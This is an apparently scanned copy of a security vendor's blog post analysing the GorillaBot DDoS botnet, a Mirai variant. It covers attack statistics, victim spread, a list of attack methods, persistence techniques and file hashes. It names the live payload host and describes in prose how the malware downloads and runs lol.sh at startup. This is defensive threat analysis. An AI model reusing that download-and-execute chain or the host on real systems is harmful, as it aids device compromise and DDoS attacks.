nsfocusglobal.com
Open in
urlscan Pro
192.124.249.162
Public Scan
URL:
https://nsfocusglobal.com/over-300000-gorillabot-the-new-king-of-ddos-attacks/
Submission: On October 02 via api from IT — Scanned from IT
Submission: On October 02 via api from IT — Scanned from IT
Form analysis 0 forms found in the DOM
Text Content
×
UNDER ATTACK
We understand that when you are under attack you need help immediately. Our team
of security experts are available to get you back online and help ensure your
critical assets are protected.
NORTH AMERICA/INTERNATIONAL HQ - SANTA CLARA, CA
CALL: + 1 408-907-6638
LATAM - SAO PAULO, BRAZIL
CALL: +55 11 3521-7124
ASIA PACIFIC - SINGAPORE
CALL: +65 6509-8500
JAPAN - TOKYO
CALL: +81 3-6206-8156
EMEA - UNITED KINGDOM
CALL: +44 (0) 20 3476 6
Under Attack? Call Us
Toggle navigation
* Blog
* Trial Enquiry
* Support Portal
* 中文
* Portuguese
Toggle navigation
* Cloud-Delivered Services
* Cloud DDoS Protection Service
* Continuous Threat Exposure Management
* Threat Intelligence Service
* Threat Intelligence Subscription Service
* Exposed Internet Surface Analysis
* Attack Threat Monitoring
* Products
* DDoS Attack Protection
* Security Operations
* Intelligent Security Operations Platform
* Unified Threat Sensor
* Remote Security Assessment System
* Web Application & API Protection
* Web Application Firewall
* Next-Generation Firewall
* Next Generation Intrusion Prevention
* Solutions
* DDoS Defenses
* On-Premises DDoS Defenses
* Hybrid DDoS Defenses
* Value-Added Service for ISP/MSP
* 5G Network Security Solution
* Cloud-in-a-Box
* Support & Services
* Services Overview
* NSFOCUS Product Support Services
* NSFOCUS Professional Services
* NSFOCUS Security Assessment Services
* NSFOCUS Managed Security Services
* Training Services
* Resources
* Datasheets
* Whitepapers
* Reports
* Case Studies
* Infographics
* Articles
* News and Events
* Press Releases
* NSFOCUS in the News
* Global Events
* Company
* About
* Management Team
* NSFOCUS Security Labs
* Careers
* Contact Us
* Blog
* Trial Enquiry
* Support Portal
* 中文
* Portuguese
* Under Attack? Call Us
OVER 300,000! GORILLABOT: THE NEW KING OF DDOS ATTACKS
OVER 300,000! GORILLABOT: THE NEW KING OF DDOS ATTACKS
September 29, 2024 | NSFOCUS
OVERVIEW
In September 2024, NSFOCUS Global Threat Hunting System monitored a new botnet
family calling itself Gorilla Botnet entering an unusually active state. Between
September 4 and September 27, it issued over 300,000 attack commands, with a
shocking attack density.
During this active period, Gorilla Botnet targeted over 100 countries, with
China and the U.S. being the hardest hit. Targets included universities,
government websites, telecoms, banks, gaming, and gambling sectors.
Gorilla Botnet supports multiple CPU architectures such as ARM, MIPS, x86_64,
and x86, and is a modified version of the Mirai source code. It introduced
various DDoS attack methods and used encryption algorithms commonly employed by
the KekSec group to hide key information, while employing multiple techniques to
maintain long-term control over IoT devices and cloud hosts, demonstrating a
high level of counter-detection awareness as an emerging botnet family.
Be proactive in your cybersecurity strategy. Contact us to find out how NSFOCUS
Anti-DDoS Solution can help!
IMPACT SCOPE
NSFOCUS Global Threat Hunting System monitoring data shows that Gorilla Botnet
issued over 300,000 DDoS attack commands in September 2024, with a daily peak of
over 20,000 commands. From the timing of the attacks, Gorilla Botnet sent out
commands continuously over 24 hours, with a relatively even distribution of
commands.
Figure 1 Attack commands
Gorilla Botnet’s attack targets included 113 countries, involving over 20,000
targets. Geographically, China suffered the most severe attacks, accounting for
20% of the total, followed by the U.S. (19%), Canada (16%), and Germany (6%).
Figure 2 Victim distribution
Furthermore, monitoring data indicates that Gorilla Botnet initiated multiple
attacks against critical infrastructure over the past month, involving over 40
organizations.
In terms of attack methods, Gorilla Botnet tends to use UDP Flood (41%),
followed by ACK BYPASS Flood (24%) and VSE Flood (12%).
Due to the limited number of “bots,” using the connectionless UDP protocol
allows for arbitrary source IP spoofing to generate relatively high traffic,
making UDP flooding attacks particularly favored. In terms of attack
implementation, attackers use a large number of self-named DDoS attacks, but
still draw from existing attack code.
Figure 3 Attack vectors
SAMPLE ANALYSIS
Core Functionality
This trojan is modified from the Mirai family, supporting architectures like
ARM, MIPS, x86_64, and x86. The online package and command parsing module reuse
Mirai source code but leave a signature message stating “gorilla botnet is on
the device ur not a cat go away,” hence we named this family GorillaBot.
Figure 4 GorrilaBot
GorillaBot has five built-in command and control (C&C) servers; upon running, it
randomly selects one to connect to, establishing a connection with the server
using the same online process as Mirai, then waits to receive commands.
Figure 5 C&C
Compared to the original Mirai, it has significantly more DDoS attack methods,
with a maximum of 19 attack vectors detailed in the table below.
VectorMethod0attack_udp_generic1attack_udp_vse3attack_tcp_syn4attack_tcp_ack5attack_tcp_stomp6attack_gre_ip7attack_gre_eth9attack_udp_plain10attack_tcp_bypass11attack_udp_bypass12attack_std13attack_udp_openvpn14attack_udp_rape15attack_wra16attack_tcp_ovh17attack_tcp_socket18attack_udp_discord19attack_udp_fivem
Encryption and Decryption Algorithms
GorillaBot also uses the encryption algorithms favored by the KekSec group to
encrypt key strings. Coupled with the signatures left in the malicious samples
and the habit of using “lol.sh” as the propagation script name, it is speculated
that this group may be related to KekSec or is using KekSec to conceal its true
identity.
Figure 6 Encryption and decryption algorithms
Persistence and Counter-Honeypot
Additionally, unlike conventional Mirai families, GorillaBot has a function
specifically written as “yarn_init,” which integrates code to exploit the Hadoop
Yarn RPC unauthorized access vulnerability.
Figure 7 Vulnerability exploitation
Installing Hadoop YARN typically requires administrator privileges, giving
attackers high permissions after exploiting the related vulnerabilities.
For persistence, the GorillaBot trojan creates a service file named
custom.service in the /etc/systemd/system/ directory, configured to run
automatically at system startup. The primary purpose of the service is to
download a script named lol.sh from the remote address
http://pen.gorillafirewall.su/ to the /tmp/ directory, set execution
permissions, and execute the script.
Figure 8 Persistence
GorillaBot also adds commands to /etc/inittab, /etc/profile, and /boot/bootcmd
to automatically download and execute the lol.sh script upon system startup,
user login, or system startup. It creates a script named mybinary in the
/etc/init.d/ directory, set to execute at system startup, including actions to
download and execute the lol.sh script. It also attempts to add a soft link to
mybinary in /etc/rc.d/rc.local or /etc/rc.conf (if not present) for execution at
system startup.
Figure 9 Persistence
Through the attacker’s description “/proc filesystem not found. Exiting. gorilla
botnet didnt like this honeypot…” it is inferred that the trojan is also
attempting to counter honeypots, such as checking whether the /proc filesystem
exists on the controlled device to determine if it is a honeypot.
Figure 10 Honeypot identification
IOC
276adc6a55f13a229a5ff482e49f3a0b
63cbfc2c626da269c67506636bb1ea30
7f134c477f307652bb884cafe98b0bf2
3a3be84df2435623132efd1cd9467b17
03a59780b4c5a3c990d0031c959bf7cc
5b37be51ee3d41c07d02795a853b8577
15f6a606ab74b66e1f7e4a01b4a6b2d7
* Cloud-Delivered Services
* Cloud DDoS Protection Service
* Continuous Threat Exposure Management
* Threat Intelligence Service
* Products
* DDoS Attack Protection
* Security Operations
* Remote Security Assessment System
* Web Application & API Protection
* Next-Generation Firewall
* Next Generation Intrusion Prevention
* Solutions
* DDoS Defenses
* Value-Added Service for ISP/MSP
* 5G Network Security Solution
* Cloud-in-a-Box
* Support & Services
* Services Overview
* NSFOCUS Product Support Services
* NSFOCUS Professional Services
* NSFOCUS Security Assessment Services
* NSFOCUS Managed Security Services
* Training Services
* Resources
* Datasheets
* Whitepapers
* Reports
* Case Studies
* Infographics
* Articles
* News and Events
* Press Releases
* NSFOCUS in the News
* Global Events
* Company
* About
* Management Team
* NSFOCUS Security Labs
* Careers
* Contact Us
*
*
*
©COPYRIGHT 2024, NSFOCUS. ALL RIGHTS RESERVED PRIVACY POLICY | TERMS OF USE |
LEGAL TERMS AND CONDITIONS
We are using cookies to give you the best experience on our website.
You can find out more about which cookies we are using or switch them off in
settings.
Accept
Close GDPR Cookie Settings
* Privacy Overview
* Strictly Necessary Cookies
Powered by GDPR Cookie Compliance
Privacy Overview
This website uses cookies so that we can provide you with the best user
experience possible. Cookie information is stored in your browser and performs
functions such as recognising you when you return to our website and helping our
team to understand which sections of the website you find most interesting and
useful.
Strictly Necessary Cookies
Strictly Necessary Cookie should be enabled at all times so that we can save
your preferences for cookie settings.
Enable or Disable Cookies
If you disable this cookie, we will not be able to save your preferences. This
means that every time you visit this website you will need to enable or disable
cookies again.
Enable All Save Settings
ShareThis Copy and Paste